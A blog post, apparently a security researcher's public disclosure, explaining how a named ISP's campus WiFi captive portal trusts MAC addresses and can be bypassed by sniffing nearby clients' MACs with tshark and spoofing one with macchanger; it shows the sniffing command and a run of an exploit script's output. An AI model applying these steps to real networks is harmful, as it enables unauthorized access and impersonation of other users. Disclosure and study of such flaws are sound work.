No, it’s not one of everyone’s favorite “Kali Wifi Hacking Tutorial”

Impersonating anyone in my college campus WiFi w/o credentials

Learning to hack stuff takes learning. Yeah, I know, weird right?
There is no “get rich quick” way to become 1337 hacker.
It’s part learning and part mindset. And no, there is no YouTube video for “WiFi hacking”.

If you didn’t switched the tab and searched the term then you’re either one, a fool who believes anything and everything anyone random over the Internet says or two, you’re well aware that those YouTube tutorials are annoying as hell and do not teach anything at all.

I get asked about being able to “hack stuff”, like cracking WiFi passwords. Mostly I just go along with them throwing in some “yeah it’s easy/tough”(s). Of-course, download Cain & Abel and search for something like Aircrack-ng on Google. I don’t go why you should learn networking, network packets, wireless networks, …you know the drill, because, I’ve tried many a times and fortunately or unfortunately have become a little better at guessing. You know what I mean, right ?

The Reconnaissance Corner

What we noticed was the subtle change in login process, it was so seamless now, right ? It felt so good.

Under the hood, something else was going on. I had a feeling. I quickly checked the source code using curl and the output was quite funny in my opinion.

Blob can be found over https://gist.github.com/0x48piraj

Some code blocks were hilarious :

</style>
<script language=”JavaScript”>
<! —
function startClock() {
//alert(‘’);
//alert(‘’.indexOf(“Id=”));
if(‘http://10.163.0.1/status’ ==’https://customer.i-on.in/')
{
location.href=’https://customer.i-on.in/';
window.open(‘http://1.186.63.155/captiveportal/?login=1&mac=B2_Hostel&page=status&link-login-only=http://10.163.0.1/login&link-logout=http://10.163.0.1/logout&uname=&mac=B2_Hostel&interface-name=B2_Hostel', ‘_blank’);
}
else
location.href = ‘http://10.163.0.1/status’;//’http://1.186.63.155/captiveportal/?login=1&mac=B2_Hostel&page=status&link-login-only=http://10.163.0.1/login&link-logout=http://10.163.0.1/logout&uname=&mac=B2_Hostel&interface-name=B2_Hostel&Reqchk=1';
}
// →
</script>

See the bold-out snippet? I know. I’m also remembering those xkcd comics.

Anyway, the payload is,

/?login=1&mac=B2_Hostel&page=status&link-login-only=http://10.163.0.1/login&link-logout=http://10.163.0.1/logout&uname=&mac=B2_Hostel&interface-name=B2_Hostel

Clearly something is fishy. Seems like they’re doing something with MAC address (&mac=…)

Let’s grab some HTTP requests

GET /login HTTP/1.1
Host: 10.163.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Nothing special, normal trigger request, let’s forward the request :

Full log can be found over https://gist.github.com/0x48piraj

Voila!
Seems like what we suspected is true, they’re trusting on MAC addresses and furthermore depending on MAC address for identification.

Okay, time to check our theory to know if it even works or not.

Proof of concept #1

Wo0t!

Searching for xkcd jokes. Loading …

Why trusting MAC address for identification is a bad idea …

In a wireless encryption enabled network the MAC address is used to uniquely identify each node (computer etc) on the network. Every packet broadcast over the network must contain the MAC address of the intended receiver to ensure packets get where they need to go. MAC addresses are sent un-encrypted. The reason for this is, MAC addresses are part of the OSI Data Link layer (level 2) and are visible in packets even if encryption such as WEP / WPA2 is used.

But why?
Suppose if you encrypted the MAC address, every client on the wireless network would need to decrypt every single packet, just to find out whether it was sent to them or not. This would consume a huge amount of CPU and battery for no real reason.

Since the MAC address in each packet is always un-encrypted, it’s trivial for any attacker to run a packet sniffer, get a list of all the MAC addresses communicating on the network, then impersonate one of them.

Looting MAC Addresses

ARP Tables

Evil Twin

Brute-forcing MAC Addresses ?

MM:MM:MM:SS:SS:SS

In mathematics and computing, hexadecimal is a positional numeral system with a radix, or base, of 16. It uses sixteen distinct symbols, most often the symbols “0”–”9" to represent values zero to nine, and “A”–”F” to represent values ten to fifteen.

The time complexity of brute force is O(n*m).

12-digit, 16 chars on each place = 16 ^ 12 = 16¹² = 2.8147498e+14;

Though, first 6-digits (MM:MM:MM) of MAC Address identifies the manufacturer, called as OUI (Organizational Unique Identifier). So, the equation reduces to :

16 ^ 12 = 16¹² → 16⁶ = 16777216

Better, but brute-force? really ?

Packet Sniffing

OR

Use tshark ❤

tshark -i <iface> -T fields -e eth.src

Writing 1337 exploit

For the collection of MAC addresses, tshark with -a flag to specify duration of capture and some slick pipelines, for spoofing MAC address, macchanger is the way to go, combined with basic bash sorcery.

Exploit script hosted on https://gist.github.com/0x48piraj

./exploit.sh

root@woot:/home/I-ON-Bypass# ./exploit.sh 
Capturing various MAC addr(s) from local network for ~1 minute …
Running as user “root” and group “root”. This could be dangerous.
Capturing on ‘wlp3s0’
3554
00:bb:60:7c:6a:fa
08:c5:e1:2a:80:fe
08:c5:e1:f4:87:bc
0c:9d:92:a3:7b:30
— REDACTED —
fc:01:7c:1c:e9:21
fc:aa:b6:4a:1b:a5
Enter target MAC addr: fc:aa:b6:4a:1b:a5
Current MAC: 80:c5:f2:b6:12:e9 (unknown)
Permanent MAC: 80:c5:f2:b6:12:e9 (unknown)
New MAC: fc:aa:b6:4a:1b:a5 (unknown)
Spoofed MAC addr, switching the network iface up [wlp3s0]
Visit http://ip-addr/login to enjoy free data.

OR

redstar-os@woot:~/home/I-ON-Bypass$ sudo ./exploit.sh 
[sudo] password for redstar-os:
Capturing various MAC addr(s) from local network for ~1 minute …
— REDACTED —

Sorry i-ON for this public disclosure, but you don’t have any bug bounty program neither you give any effs to my sent emails. I hope this blog will put some pressure and you’ll fix the vulnerability as soon as possible.

About the Author

You can connect with him over LinkedIn, Twitter, Instagram

Social Jazz.

Google Code-In C. Winner. GsOCer ‘19. Independent Security Researcher. Have hacked Medium, Mozilla, Opera & many more. Personal Website: https://0x48piraj.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store